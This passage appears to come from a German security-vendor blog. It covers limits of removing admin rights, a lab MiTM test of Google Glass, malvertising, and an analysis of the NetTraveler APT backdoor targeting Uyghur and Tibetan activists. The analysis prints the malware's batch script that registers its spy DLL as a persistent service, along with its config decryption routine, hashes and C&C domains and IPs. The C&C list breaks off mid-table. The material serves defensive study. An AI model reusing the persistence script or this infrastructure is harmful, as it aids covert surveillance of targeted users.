Die Gewährleistung der reibungslosen Funktion von kritisch wichtigen Systemen sowie die Minderung des Risikos von Angriffen auf das Unternehmensnetzwerk – das sind die vorrangigen Aufgaben der Abteilung für IT-Sicherheit fast jedes beliebigen Unternehmens. Eine der effektivsten Strategien zur Erfüllung dieser Aufgaben ist die Einschränkung der Befugnisse der Systemanwender.

Aus Sicht der IT-Sicherheit haben kritische Systeme zwei grundlegende Eigenschaften – Ganzheitlichkeit und Zugänglichkeit – von denen das reibungslose Funktionieren dieser Systeme abhängt. Für den Schutz eines Unternehmensnetzwerks vor Attacken muss unbedingt die „Angriffsoberfläche“ (attack surface) verringert werden, indem die Zahl der Geräte und Netzdienste reduziert wird, auf die von außerhalb des Unternehmensnetzwerks zugegriffen werden kann, und indem der Schutz solcher Systeme und Dienste gewährleistet wird, die einen solchen Zugriff benötigen (Web-Services, Gateways, Router, Workstations usw.). Insbesondere Anwendercomputer mit Internetzugang sind ein wichtiger Angriffsvektor auf das Unternehmensnetzwerk.

Um kritische Systeme vor nicht sanktionierten Veränderungen zu schützen und die Möglichkeiten von Angriffen auf ein Unternehmensnetzwerk zu reduzieren, müssen unbedingt die folgenden Maßnahmen ergriffen werden:

  • Festlegen, welche Objekte (Equipment, Systeme, Geschäftsanwendungen, wertvolle Dokumente usw.) im Unternehmensnetzwerk geschützt werden müssen;
  • die Geschäftsprozesse des Unternehmens beschreiben und in Übereinstimmung mit ihnen das Zugriffslevel auf die zu schützenden Objekte definieren;
  • sicherstellen, dass jedem Subjekt (Anwender oder Unternehmensanwendung) ein eindeutiger Account zugeordnet ist;
  • den Zugriff der Subjekte auf die Objekte soweit es geht beschränken, d.h. die Rechte der Subjekte im Rahmen der Geschäftsprozesse einschränken;
  • sicherstellen, dass alle Operationen der Subjekte an den Objekten protokolliert und die Protokolle an sicheren Orten gespeichert werden.

In der Praxis sieht es in einem Unternehmensnetzwerk ungefähr folgendermaßen aus:

  • Alle Unternehmensdokumente werden zentralisiert gespeichert, in allgemeinen Ordnern auf einem der Unternehmensserver (beispielsweise auf einem Server in der Rolle eines Document Controllers).
  • Der Zugriff auf kritische Systeme ist allen verboten, außer den Administratoren – jeder beliebige Admin kann im Falle eines Absturzes aus der Ferne auf das System zugreifen, um alles schnell zu reparieren.
  • Manchmal verwenden die Administratoren einen „gemeinsamen“ Account.
  • Die Accounts aller normalen Mitarbeiter verfügen über die überaus eingeschränkten Rechte eine „gewöhnlichen Anwenders“, doch auf den ersten Wunsch hin kann ein jeder die Rechte eines lokalen Administrators erhalten.

Technisch ist es um Einiges einfacher, kritische Systeme zu schützen als Workstations, da es selten zu Veränderungen der Geschäftsprozesse kommt, die Regelung bezüglich ihres Einsatzes sich kaum ändert und daher auch das kleinste Detail berücksichtigt werden kann. Im Gegensatz dazu ist die Arbeitsumgebung der Anwender chaotisch, die Prozesse ändern sich stetig und zusammen mit ihnen ändern sich die Anforderungen an die Gewährleistung des Schutzes. Zudem stehen viele Anwender jeglichen Einschränkungen skeptisch, wenn nicht gar negativ gegenüber, selbst wenn sie ihre Arbeitsprozesse gar nicht berühren. Daher ist der traditionelle Schutz des Anwenders nach dem Motto aufgebaut: „Lieber Malware durchlassen, als irgendetwas Notwendiges blockieren.“

Im vergangenen Jahr hat das Unternehmen Avecto eine Untersuchung bekannter Sicherheitslücken in der Software von Microsoft durchgeführt und ist zu dem Schluss gekommen, dass „Der Verzicht auf die Nutzung der Rechte eines lokalen Administrators es ermöglicht, die Risiken der Ausnutzung von 92% der kritischen Sicherheitslücken in der Software von Microsoft zu verringern“. Diese Schlussfolgerung erscheint völlig logisch, doch man muss dazu sagen, dass das Unternehmen Avecto keine reale Untersuchung der Sicherheitslücken durchgeführt, sondern lediglich die Daten aus dem Microsoft Vulnerability Bulletin 2013 analysiert hat. Trotzdem liegt es auf der Hand, dass Schadsoftware, die ohne Administratorenrechte gestartet wurde, keine Driver installieren kann, keine Dateien in den Verzeichnissen %systemdrive%, %windir%, %programfiles% usw. erstellen/modifizieren kann, die Konfiguration des Systems nicht verändern kann (insbesondere nicht in den Hauptschlüssel der Registry, HKLM, schreiben), und – was am Wichtigsten ist – keine privilegierten API-Funktionen nutzen kann.

Doch in Wahrheit sind fehlende Administratorenrechte kein wirklich ernsthaftes Hindernis – weder für Schadprogramme noch für Hacker, die in ein Unternehmensnetzwerk eindringen wollen. Erstens finden sich in jedem beliebigen System Dutzende Sicherheitslücken, mit Hilfe derer man sich die notwendigen Rechte verschaffen kann – bis hin zu Privilegien auf Kernel-Ebene. Zweitens existieren auch Bedrohungen, die sich schon mit den Rechten eines gewöhnlichen Anwenders realisieren lassen. Auf dem unten stehenden Schema sind mögliche Angriffsvektoren dargestellt, für deren Umsetzung keine Administratorenrechte erforderlich sind – und genau um diese geht es hier.

Lokale Attacken

Allein mit den Standardrechten eines gewöhnlichen Benutzers ausgestattet, erhält ein Cyberkrimineller vollständigen Zugriff auf die Speicher aller Prozesse, die unter dem Account des Anwenders laufen. Das ist vollkommen ausreichend, um schädlichen Code in die Prozesse einzuschleusen, mit dessen Hilfe das System entfernt gesteuert (Backdoor), die Tastatureingaben abgefangen (Keylogger) und der Content im Browser modifiziert werden kann. Und so weiter.

Da die meisten Antiviren-Programme den Versuch der Einschleusung von unbekanntem Code in die Prozesse blockieren, greifen Cyberverbrecher häufig auf verdeckte Methoden zurück. Ein alternativer Ansatz ist zum Beispiel die Einschleusung einer Backdoor oder eines Keylogger in den Prozess des Browsers – unter Verwendung von Plug-Ins und Erweiterungen. Für den Download eines Plug-Ins sind die Rechte eines gewöhnlichen Benutzers völlig ausreichend, dabei kann der Code des Plug-Ins fast genau das Gleiche machen, was auch ein vollwertiger trojanischer Code tun kann – d.h. entfernt den Browser steuern, die eingegebenen Daten und den Traffic im Browser protokollieren und mit Webservices interagieren und den Inhalt von Seiten modifizieren (Phishing).

Nicht weniger interessant für Cyberkriminelle sind die gewöhnlichen Office-Anwendungen (beispielsweise E-Mail- und IM-Clients), die für Angriffe auf andere Anwender im Netz (unter anderem Phishing und Social Engineering) benutzt werden können. Ein Online-Verbrecher kann sich Zugriff auf Programme wie Outlook, The Bat, Lync, Skype usw. verschaffen, und zwar nicht nur, indem er Code in die entsprechenden Prozesse einschleust, sondern auch über die Programmierschnittstelle und die lokalen Dienste dieser Anwendungen.

Es ist klar, dass nicht nur die Anwendungen, sondern auch die auf dem PC gespeicherten Daten für Cyberkriminelle einen großen Wert darstellen können. Neben Unternehmensdokumenten suchen Kriminelle oft nach Dateien verschiedener Anwendungen, die Passwörter, verschlüsselte Daten, digitale Schlüssel (SSH, PGP und andere) und vieles mehr enthalten. Befindet sich auf dem Computer eines Anwenders Quellcode, so können Cybergangster versuchen, ihren schädlichen Code dort einzuschleusen.

Domain-Attacken

Da die Konten der meisten Unternehmensanwender Domain-Accounts sind, ermöglicht der Mechanismus der Domain-Autorisierung (Windows Authentication) dem Anwender den Zugriff auf unterschiedliche Netzdienste im Unternehmensnetzwerk. Häufig wird der Zugriff automatisch bereitgestellt, ohne zusätzliche Abfrage der Login-Daten und des Passworts. Wenn ein infizierter Anwender also Zugriffsrechte auf irgendeine Unternehmensdatenbank besitzt, so kann ein Cyberkrimineller sie ebenfalls problemlos nutzen.

Mit Hilfe der Domain-Autorisierung haben Cyberkriminelle auch Zugriff auf alle Netzwerkordner und –Festplatten, die für den Anwender verfügbar sind, auf interne Internet-Ressourcen und manchmal auch auf andere Workstations im selben Segment des Netzwerks.

Neben Netzwerkordnern und Datenbanken finden sich in einem Unternehmensnetzwerk nicht selten verschiedene Netzdienste, wie z.B. Remote-Zugriff, FTP, SSH, TFS, GIT, SVN usw. Selbst wenn für den Zugriff auf diese Dienste separate Accounts (also keine Domain-Konten) verwendet werden, kann ein Online-Verbrecher sie problemlos im Arbeitsprozess des Anwenders nutzen (d.h. während einer aktiven Sitzung).

Schutz

Es ist praktisch unmöglich, ein hohes Sicherheitsniveau auf Workstations zu gewährleisten, nur indem den Anwendern die Administratorenrechte entzogen werden. Auch die Installation von Antiviren-Software auf einer Workstation erhöht vielleicht den Schutz, löst aber nicht alle Probleme. Zum Erreichen eines hohen Sicherheitsniveaus kann die Technologie Application Control („Anwendungskontrolle“) beitragen, die aus drei Schlüsselelementen besteht:

  1. Im Modus ‚Default Deny’ (standardmäßig verboten) wird nur solche Software installiert und ausgeführt, die vom Administrator zugelassen wurde. Dabei muss der Administrator keineswegs jede einzelne Anwendung in die Weiße Liste aufnehmen (Hash). Ihm steht eine Vielzahl von generischen Tools zur Verfügung, die es ermöglichen, der Liste der erlaubten Software dynamisch alle Programme hinzuzufügen, die mit dem einen oder anderen Zertifikat signiert sind, von bestimmten Herstellern entwickelt wurden, aus vertrauenswürdigen Quellen stammen oder in der Whitelisting-Datenbank eines Produzenten von Sicherheitslösungen enthalten sind.
  2. Der Modus ‚Kontrolle vertrauenswürdiger Anwendungen‘ macht es möglich, die Arbeit der zugelassenen Software auf die Funktionen zu beschränken, die diese Software auch tatsächlich ausführen soll. Für seine normale Funktionsweise sollte ein Browser beispielsweise die Möglichkeit haben, Netzverbindungen herzustellen, doch dabei ist es keineswegs notwendig, dass der Browser den Speicher anderer Prozesse ausliest bzw. hineinschreibt, sich mit Netz-Datenbanken verbindet oder Dateien in Internetressourcen speichert.
  3. Die Kontrolle der Update-Installation ermöglicht die reibungslose Aktualisierung von Software auf Workstations (im Modus ‚Default Deny‘), während gleichzeitig das Risiko einer Systeminfektion durch Update-Mechanismen gemindert wird.

Neben dem oben Aufgeführten stellen konkrete Produkte mit integrierter Application Control auch verschiedene andere nützliche Funktionen auf der Grundlage dieser Technologie bereit. Insbesondere sind das die Inventarisierung, die Kontrolle der im Netzwerk installierten Software, das Zusammenstellen von Ereignisberichten (die bei der Untersuchung von Sicherheitsvorfällen hilfreich sein können) usw.

Die Kombination der Technologien ermöglicht es einerseits, dem Nutzer all das an die Hand zu geben, was er für seine Arbeit und selbst zu Unterhaltungszwecken braucht. Und selbst wenn er morgen noch irgendetwas anderes benötigt, so kann er sich dieses „Irgendetwas“ ohne Probleme besorgen. Gleichzeitig aber sind die Möglichkeiten eines Cyberkriminellen, der sich Zugriff auf ein geschütztes System verschaffen konnte, überaus eingeschränkt. Zweifellos ist das die ideale Balance zwischen Flexibilität und Sicherheit beim Schutz von Unternehmensnetzwerken.

Wie Cyberkriminelle die Welt durch Ihre Augen sehen


  Roberto Martinez       10 September 2014 | 17:03  MSK

Ihr Kommentar  

Technologie hat unser Leben verändert, unsere Art zu leben, unsere Art zu arbeiten. Durch das Aufkommen von „Wearable Computern“, tragbaren Computersystemen also, die während der Anwendung am Körper des Nutzers befestigt sind, erscheint den Menschen die Verschmelzung der virtuellen mit der physikalischen Welt immer selbstverständlicher, denn sie nutzen diese Technologie nun ununterbrochen. Google Glass ist eins der erstaunlichsten tragbaren Geräte, und obgleich es sich noch in einem frühen Entwicklungsstadium befindet, lässt sich nicht leugnen, dass man tolle Sachen damit anstellen und die Welt mit dem Gerät auf eine andere Art und Weise erfahren kann.

google_glass_1

Mit der Out-the-Box-Funktionalität kann man das Internet durchsuchen, Fotos oder Videos aufnehmen, E-Mails checken, Nachrichten senden oder Informationen auf Google+ veröffentlichen. Was uns wirklich fasziniert, sind die denkbaren Einsätze solcher Geräte in Bereichen wie Medizin und Bildung. Das Gerät könnte für Chirurgen unentbehrlich werden, um die vitalen Funktionen von Patienten zu kontrollieren oder Operationen live per Video an andere Spezialisten zu senden. Ebenso sind neue Möglichkeiten vorstellbar, Studenten Wissen interaktiv zu vermitteln. Möglicherweise sind sogar Verbesserungen in der Strafverfolgung möglich, beispielsweise durch eine sofortige Identifizierung von gesuchten Verbrechern.

google_glass_2


google_glass_3

Leider gehen mit neuen Technologien auch immer neue Sicherheitsrisiken einher. Es gibt tatsächlich viele Bedenken wegen der potentiellen Datenschutz-Risiken und der Art, wie diese neuen Geräte kompromittiert werden könnten. Cyberkriminelle liegen nicht auf der faulen Haut und suchen ständig nach neuen Wegen, sich an ihren Opfern zu bereichern – wann immer sich ihnen eine solche Möglichkeit bietet, arbeiten sie Tag und Nacht daran, ihr Ziel zu erreichen.

Neue Technologien, alte Risiken.

google_glass_4

Neue und bereits bekannte Geräte haben vieles gemeinsam: Sie verwenden dieselben Protokolle und sind mit anderen Geräten, die ähnliche Apps verwenden, vernetzt. Daran geht kein Weg vorbei. Traditionelle Angriffsvektoren sind meist auf die Netzwerkebene ausgerichtet, in Form von Man-in-The-Middle-Attacken (MiTM), auf die Ausnutzung von einigen Sicherheitslücken im Betriebssystem oder in den Anwendungen selbst. Da Glass auf Android basiert, könnte es bekannte Sicherheitslücken enthalten, die in anderen Geräten mit demselben Betriebssystem gefunden wurden.

Es gibt zwei Arten, mit Google Glass im Internet zu surfen: Via Bluetooth in Kombination mit einem mobilen Gerät, das seine Netzwerkverbindung teilt, oder direkt über Wi-Fi mit vorheriger Konfiguration des Netzwerks über den MyGlass-Account oder einen von einer mobilen App generierten QR-Code.

google_glass_5


google_glass_6



Das Hinzufügen eines Netzwerks ist überaus simpel: Durch das Eintragen eines Netzwerknamens und eines Passworts wird ein QR-Code generiert, der die Verbindungseinstellungen enthält, die dann – wenn durch Glass darauf geschaut wird – eine automatische Verbindung zum Netzwerk herstellen.

google_glass_7



Letztes Jahr wurde von dem Sicherheitsunternehmen Lookout eine Sicherheitslücke im Zusammenhang mit dieser Prozedur veröffentlicht, die dazu führen könnte, dass der Nutzer dazu gebracht wird, sich über einen schädlichen QR-Code mit einem gefälschten Zugriffspunkt zu verbinden. Potentielle Angreifer hätten damit die Möglichkeit, die Netzwerkkommunikation abzufangen und die Navigation zu einer schädlichen Webseite umzuleiten, die eine bekannte Android-Web-Sicherheitslücke ausnutzen könnte. Diese Sicherheitslücke wurde gepatcht, doch sie hat uns deutlich vor Augen geführt, dass Angreifer durchaus in der Lage sind, Wege aufzutun, diese neuen Geräte zu kompromittieren.

Eine potentiell Risikoquelle besteht darin, dass das Glass-Interface – anders als es bei Computern oder mobilen Geräten der Fall ist - über ‘Cards’ navigiert wird, um durch die verschiedenen Anwendungen und Einstellungen zu scrollen, wodurch die Konfigurationsoptionen eingeschränkt werden und in manchen Fällen bestimmte Prozeduren und Funktionen mit nur geringem Input seitens des Users automatisiert werden, wie z.B. beim Verbinden mit einem Netzwerk oder beim Teilen von Informationen. Diese Automatisierung öffnet der Ausnutzung durch Angreifer und der Kompromittierung privater Anwenderdaten Tor und Tür.

Ein weiteres Einfallstor für Cyberbedrohungen ist die Neigung der User, den 'Debug Mode’ zu aktivieren, um auch Anwendungen außerhalb des offiziellen Glassware-Ökosystems zu installieren, wobei allerdings auch das Risiko steigt, schädliche Anwendungen zu installieren.

Dadurch wird auch die Möglichkeit eröffnet, neue Angriffe unter Verwendung alter Methoden durchzuführen, wie etwa Social Engineering – mit Hilfe der magischen Wörter „kostenlos“ und „Sex“. Obgleich nicht alle Apps, die auf diese Art beworben werden, schädlich sind, sind diese Begriffe Magneten für Anwender, die auf der Suche nach neuen Erfahrungen bereit sind, den vom Hersteller vorbereiteten komfortablen Bereich zu verlassen.

google_glass_8



Ein einfacher Test

Wie bereits oben erwähnt, unterscheidet sich Glass insbesondere dadurch von anderen „Wearables“, dass es möglich ist, sich direkt über eine Wi-Fi-Verbindung im Internet zu bewegen, ohne ein mobiles Gerät „huckepack“ haben zu müssen, von dem man abhängig ist. Trotzdem bedeutet diese Fähigkeit auch, dass das Gerät potentiell Angriffen über das Netzwerk ausgesetzt ist, insbesondere MiTM.

Stellen Sie sich einmal vor, Sie sitzen in Ihrem Lieblingscafé und möchten sich mit Glass mit dem Wi-Fi-Netz verbinden. Sie stellen das Netzwerk ein und sind schon unterwegs – Sie checken sich bei Foursquare ein, starten eine App, um den Song, der im Hintergrund gespielt wird zu identifizieren und den dazugehörigen Songtext abzurufen. Doch was ist, wenn jemand in dem Netzwerk ein Tool verwendet, um die anderen Geräte dazu zu bringen den Traffic zu einer IP-Adresse umzuleiten und so den gesamten Netzwerk-Traffic zu kapern?

Wir haben genau diese Situation in einem kontrollierten Labor-Netzwerk simuliert. Sobald das Netzwerk kompromittiert war, haben wir bei Google einige Suchanfragen gestellt, sind auf einige harmlose Seiten gesurft, haben Bilder und Mitteilungen an ein paar unserer Kontakte verschickt und sogar die neusten Nachrichten gelesen.

google_glass_9



Sobald wir ausreichend Traffic für eine Analyse abgefangen hatten, fanden wir heraus, dass fast der gesamte Traffic auch nach der Kompromittierung des Netzwerks verschlüsselt blieb, insbesondere die Google-Suchen. Wir fanden allerdings genügend Informationen in Klartext, um die Bewegung des Users zu Fluggesellschaften, Hotels und Touristenzielen nachzuvollziehen und zu rekonstruieren. Wir konnten zudem bestimmen, wie und wo das Gerät verbunden war. Keine allzu sensitiven Daten, die allerdings nützlich sein könnten, wenn es darum geht, ein Nutzer-Profil zu erstellen.

Letztlich muss man sich die Sicherheit – wie bei anderen Geräten auch – in Ebenen vorstellen, und wir müssen jede Ebene schützen, um das Risiko einer Kompromittierung zu verringern. In diesem Fall könnte die Netzwerk-Ebene ausgenutzt werden, da sich das Gerät mit öffentlichen Netzwerken verbinden kann, aber nicht über die Option für VPN-Verbindungen verfügt, so dass Traffic abgefangen und analysiert werden kann.

In den kommenden Monaten werden wir feststellen müssen, dass am Körper tragbare Geräte zum neuen Angriffsziel werden. Das heißt, wir müssen diesen Geräten unsere besondere Aufmerksamkeit zuteilwerden lassen, ebenso wie ihren Möglichkeiten und den Informationen, die sie verarbeiten.

Folgen Sie mir auf Twitter @r0bertmart1nez

Lücken im Schutz von Unternehmensnetzwerken: Werbenetze


  Kirill Kruglov         4 September 2014 | 15:31  MSK

Ihr Kommentar  

Der Begriff „Malvertising“ ist noch relativ neu. Er beschreibt eine Malware-Verbreitungsmethode über Werbenetzwerke, die schon seit langem zu den von Cyberkriminellen gern genutzten Werkzeugen gehören. Innerhalb der letzten vier Jahre wurden hunderte Millionen von Anwendern zu Opfern dieser „Viren“-Werbung, darunter auch die Besucher so großer Medien-Sites wie NY Times, London Stock Exchange, Spotify, USNews, TheOnion, Yahoo! und YouTube. Die schwierige Situation mit den Werbenetzwerken hat den ständigen Ermittlungsausschuss des US-Senats zur Durchführung von Ermittlungen veranlasst, in Folge derer empfohlen wird, die Sicherheitsmaßnahmen zu verschärfen und den Besitzern von Werbeplattformen eine größere Verantwortung zu übertragen.

Kurz vor dem Jahreswechsel 2013/2014 wurden 2,5 Millionen Yahoo-Anwender von Cyberkriminellen angegriffen. Kurz nach diesem Vorfall veröffentlichte das Unternehmen Fox IT eine detaillierte Analyse der Attacke. Bemerkenswert ist, dass ihren Angaben zufolge nicht alle Nutzer von Yahoo! betroffen waren, sondern nur User aus europäischen Ländern, in erster Linie aus Rumänien, England und Frankreich. Die Analysten von Fox IT weisen darauf hin, dass die Cyberkriminellen aller Wahrscheinlichkeit nach Mechanismen der zielgerichteten Werbung nutzten, d.h. sie kauften „Werbeeinblendungen“ für eine bestimmte Zielgruppe aus den oben erwähnten Ländern. Hier eine anschauliche Darstellung von Angriffen über Werbenetzwerke: allgemeines Angriffsschema (links) und ein konkretes Beispiel anhand des Angriffs auf die User von Yahoo! (rechts).


malvertising_1


Wir berichteten bereits über zielgerichtete Angriffe unter Ausnutzung vertrauenswürdiger Websites (Wasserloch-Attacken) und social Engineering in sozialen Netzwerken und IM-Clients. Wir gingen dabei insbesondere darauf ein, dass Cyberkriminelle für die Durchführung einer Wasserlochattacke erstens unbedingt eine vertrauenswürdige Website hacken und zweitens unbemerkt schädliche Skripte auf dieser Site einschleusen müssen. Zur Umsetzung von Angriffen über soziale Netzwerke und IM-Clients müssen Online-Verbrecher ebenfalls eine Reihe von Bedingungen erfüllen und sich zumindest das Vertrauen des Anwenders erschleichen, um die Wahrscheinlichkeit zu erhöhen, dass das Opfer auf einen vom Verbrecher gesendeten Link klickt.

Der grundlegende Unterschied zu Attacken über Werbenetzwerke liegt darin, dass die Cyberkriminellen hier keinerlei Sites hacken und sich auch nicht das Vertrauen ihrer potentiellen Opfer erschleichen müssen. Sie müssen lediglich einen Werbeprovider finden, bei dem man „Werbeeinblendungen“ kaufen kann oder selbst so ein Provider werden (nach Art von BadNews). Die restliche Arbeit zur Verbreitung des Schadcodes übernehmen die Mechanismen des Werbenetzwerks – im Endeffekt lädt die vertrauenswürdige Site selbst die schädlichen Skripte über iframe auf ihre Seiten.

Und auch der Anwender muss nirgendwo klicken – beim Versuch, das Banner auf der Seite der Website anzuzeigen, führt der Browser den SWF/JS-Code des Banners aus, der den User automatisch auf die Site umleitet, die die Startseite eines populären Exploit-Packs enthält, beispielsweise Blackhole. Daraufhin beginnt eine Drive-by-Attacke – das Exploit-Pack versucht, das passende Exploit für einen Angriff auf eine Sicherheitslücke im Browser oder in den dazugehörigen Plug-Ins zu finden.

Das Problem der Werbenetzwerke, die zur Verbreitung von Schadsoftware und zur Umsetzung von zielgerichteten Attacken eingesetzt werden (dank der Möglichkeiten der zielgerichteten Werbung), betrifft nicht nur die Nutzer von Browsern, die die eine oder andere Website besuchen. Dieses Problem betrifft auch die Nutzer von Anwendungen, die über einen Mechanismus zur Darstellung von Werbung verfügen: IM-Clients (insbesondere Skype), E-Mail-Clients (eben auch Yahoo!) usw. Am wichtigsten ist aber – das Problem besteht auch für die Unmenge von Nutzern mobiler Apps, die ebenfalls Werbenetzwerke verwenden!

Der qualitative Unterschied von mobilen Anwendungen besteht darin, dass gewöhnliche SDK zur Integration von Werbung in Anwendungen (wie beispielsweise AdMob, Adwhirl und andere) es nicht erlauben, willkürlichen Code der Werbeprovider auszuführen, wie es im Fall von Werbung auf einer Website möglich ist. Das bedeutet, vom „Werbungs-Lieferserver“ werden nur statische Daten angenommen – Bilder, Links, Einstellungen usw. Doch neben den Medien des Unternehmens entwickeln auch Cyberkriminelle solche SDK, indem sie den Entwicklern einen hohen Preis für jeden Klick im Vergleich zu den legitimen Konkurrenten anbieten. Auf diese Weise schleusen die Entwickler von legitimer mobiler Software selbst den schädlichen Werbe-Code in ihre Anwendungen ein, bei dem es sich tatsächlich um eine Backdoor handelt. Darüber hinaus können in legitimen SDK auch Sicherheitslücken vorhanden sein, die die Ausführung von willkürlichem Code ermöglichen. Ende vergangenen Jahres wurden zwei derartige Vorfälle registriert – mit HomeBase SDK und mit AppLovin SDK.


malvertising_2


Quelle: http://researchcenter.paloaltonetworks.com

Es ist nicht leicht, eine Antwort auf die Frage zu finden: „Wie schützt man das Unternehmensnetzwerk vor Attacken über Werbe-Netzwerke?“, insbesondere wenn man mögliche zielgerichtete Attacken genauer betrachtet. Wie bereits oben erwähnt, müssen nicht nur die Workstations (Browser, IM-Clients, E-Mail-Clients und andere Anwendungen mit integrierter dynamischer Werbung) geschützt werden, sondern auch mobile Geräte, die an das Unternehmensnetzwerk angeschlossen sind.

Es liegt auf der Hand, dass für den Schutz der Workstations mindestens eine Antiviren-Lösung der Klasse Security Suite erforderlich ist, die unbedingt die folgenden Funktionen enthalten muss:


  • Schutz vor Ausnutzung von Sicherheitslücken;

  • ein fortschrittliches HIPS mit Zugriffsbeschränkungsfunktionen sowie mit Funktionen der heuristischen und verhaltensbasierten Analyse (unter anderem ein Traffic-Analyser);

  • Methoden zur Funktionskontrolle des Betriebssystems (System Watcher oder Hypervisor) für den Fall, dass trotz allem Malware in das System eindringen konnte.

Um den Schutz von Workstations noch zuverlässiger zu gestalten, sollten außerdem Technologien zur Anwendungskontrolle eingesetzt werden, und es sollten Statistiken über die im Netz laufende Software zusammengestellt werden (Inventarisierung); es sollten Updatemechanismen konfiguriert und der Modus Default Deny aktiviert werden.

Verglichen mit dem Schutz von Workstations befindet sich der Schutz für mobile Geräte leider erst in der Entwicklungsphase. Es ist äußerst schwierig eine vollwertige Security Suite oder Anwendungskontrolle für mobile Geräte umzusetzen, da zu diesem Zweck die Firmware modifiziert werden muss, was nicht immer möglich ist. Daher ist die effektivste Technologie zum Schutz von an das Unternehmensnetzwerk angeschlossenen Geräten zum gegenwärtigen Zeitpunkt das Mobile Device Management, das bestimmt, welche Anwendungen auf dem Gerät installiert werden können und welche Apps nicht installiert werden sollten.

Cyberkriminelle verwenden schon seit Jahre Werbenetzwerke, um Malware zu verbreiten. Gleichzeitig wächst der Markt der Internet-Werbung stetig, er weitet sich auf neue Plattformen aus (große Portale, populäre Anwendungen, mobile Geräte) und zieht immer mehr Werbekunden, Partner und Vermittler an, die sich in einem außerordentlich verworrenen Netz miteinander verflechten. Das Problem mit den Werbenetzwerken ist ein weiteres Beispiel dafür, dass die rasante Entwicklung von Technologien nicht immer von einer rechtzeitigen Entwicklung der entsprechenden Schutzmechanismen begleitet wird.

Rundum-Erneuerung der NetTraveler APT zum 10-jährigen Jubiläum


  Costin       27 August 2014 | 15:00  MSK

Ihr Kommentar  

Über NetTraveler haben wir bereits HIER und HIER berichtet.

Früher in diesem Jahr beobachteten wir eine Zunahme der Angriffe gegen uigurische und tibetanische Aktivisten und Unterstützer unter Verwendung einer aktualisierten Version der NetTraveler-Backdoor.

Hier ein Beispiel für eine zielgerichtete Spearphishing-E-Mail, die im März 2014 an uigurische Aktivisten gesendet wurde.

nettraveler_1

Die Mail enthält zwei Anhänge – eine nicht schädliche JPG-Datei und eine 373 KB große MS Word .DOC-Datei.

Dateiname"Sabiq sot xadimi gulnar abletning qeyin-Qistaqta olgenliki ashkarilanmaqta.doc"
MD5b2385963d3afece16bd7478b4cf290ce
Größe381,667 Bytes

Die .DOC-Datei, die in Wahrheit ein “Single File Web Page”-Container ist, auch bekannt als “Web Archive Datei”, scheint auf einem System erstellt worden zu sein, das MS-Office vereinfachtes Chinesisch verwendet.

Sie enthält ein Exploit für die Sicherheitslücke CVE-2012-0158, das von Kaspersky Lab-Produkten als Exploit.MSWord.CVE-2012-0158.db detektiert wird.

Wird dieses Exploit auf einer angreifbaren Version von MS-Office ausgeführt, transportiert es das Hauptmodul “net.exe” (von Kaspersky Lab-Produkten detektiert als Trojan-Dropper.Win32.Agent.lifr) auf das System, welches wiederum eine Reihe von anderen Dateien installiert. Das wichtigste C&C-Modul wird unter “%SystemRoot%\system32\Windowsupdataney.dll” abgelegt, (von Kaspersky als Trojan-Spy.Win32.TravNet.qfr detektiert).

NameWINDOWSUPDATANEY.DLL
MD5c13c79ad874215cfec8d318468e3d116
Größe37,888 Bytes

Es wird durch eine Windows Batch-Datei mit dem Namen “DOT.BAT” (von Kaspersky Lab-Produkten als Trojan.BAT.Tiny.b detektiert) als Service (unter der Bezeichnung “Windowsupdata”) registriert:

@echo off


@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v Windowsupdata /t REG_MULTI_SZ /d Windowsupdata /f

@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v ImagePath /t REG_EXPAND_SZ /d %SystemRoot%\System32\svchost.exe -k Windowsupdata /f

@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v DisplayName /t REG_SZ /d Windowsupdata /f

@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v ObjectName /t REG_SZ /d LocalSystem /f

@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v ErrorControl /t REG_DWORD /d 1 /f

@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v Start /t REG_DWORD /d 2 /f

@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\system32\Windowsupdataney.dll /f


Um sicher zu gehen, dass die Malware nicht mehrfach ausgeführt wird, verwendet sie den Mutex “SD_2013 Is Running!”, um die Anwesenheit im System zu markieren. In älteren und aktuellen Varianten wurden unter anderem die folgenden Mutexes verwendet:


  • Boat-12 Is Running!

  • DocHunter2012 Is Running!

  • Hunter-2012 Is Running!

  • NT-2012 Is Running!

  • NetTravler Is Running!

  • NetTravler2012 Is Running!

  • SH-2011 Is Running!

  • ShengHai Is Running!

  • SD2013 is Running!

Die Konfigurationsdatei der Malware ist in den “SYSTEM”-Ordner geschrieben (anstatt in den Ordner SYSTEM32) und hat gegenüber den „älteren“ NetTraveler-Samples ein leicht verändertes Format:

nettraveler_2

Für die Akten: So sieht eine ältere Konfigurationsdatei von NetTraveler aus:

nettraveler_3

Offensichtlich haben die Entwickler von NetTraveler Maßnahmen ergriffen, in dem Versuch, die Konfiguration der Malware zu verbergen. Glücklicherweise lässt sich die Verschlüsselung recht leicht knacken.

Der Algorithmus sieht folgendermaßen aus:

for (i=0;i<string_size;i++)

decrypted[i]=encrypted[i] - (i + 0xa);



Entschlüsselt erhalten wir die folgende neue Konfigurationsdatei:

nettraveler_4

Problemlos kann man den Command-und-Control-Server (C&C) mit der Adresse “uyghurinfo[.]com” in dem oben stehenden Screenshot herauslesen.

Wir haben mehrere Samples identifiziert, die dieses neue Verschlüsselungsschema benutzen. Es folgt eine Liste aller erkannten C&C-Server:

C&C-ServerIPIP-StandortRegistrar
ssdcru.com103.30.7.77Hong Kong, Albert Heng, Trillion CompanySHANGHAI MEICHENG TECHNOLOGY
uygurinfo.com216.83.32.29United States, Los Angeles, Integen IncTODAYNIC.COM
INC.
samedone.com122.10.17.130Hong Kong, Kowloon, Hongkong Dingfengxinhui Bgp DatacenterSHANGHAI MEICHENG TECHNOLOGY
gobackto.net103.1.42.1Hong Kong, Sun Network (hong Kong) LimitedSHANGHAI MEICHENG TECHNOLOGY
worksware.netN/AN/ASHANGHAI MEICHENG TECHNOLOGY
jojomic.comwas
202.146.219.14
